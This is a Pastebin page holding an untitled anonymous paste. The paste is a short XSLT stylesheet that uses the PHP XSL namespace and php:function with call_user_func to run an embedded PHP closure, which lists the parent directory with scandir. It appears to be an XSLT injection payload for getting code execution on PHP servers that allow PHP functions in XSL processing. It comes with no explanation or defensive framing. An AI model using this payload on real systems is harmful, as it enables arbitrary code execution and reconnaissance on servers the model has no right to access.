Advertisement
Guest User

Untitled

a guest
Dec 12th, 2019
84
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.29 KB | None | 0 0
  1. <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
  2. <xsl:template match="/">
  3. <xsl:value-of select="php:function('call_user_func', function(){
  4. return print_r(scandir('..'), true);
  5. })"/>
  6. </xsl:template>
  7. </xsl:stylesheet>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement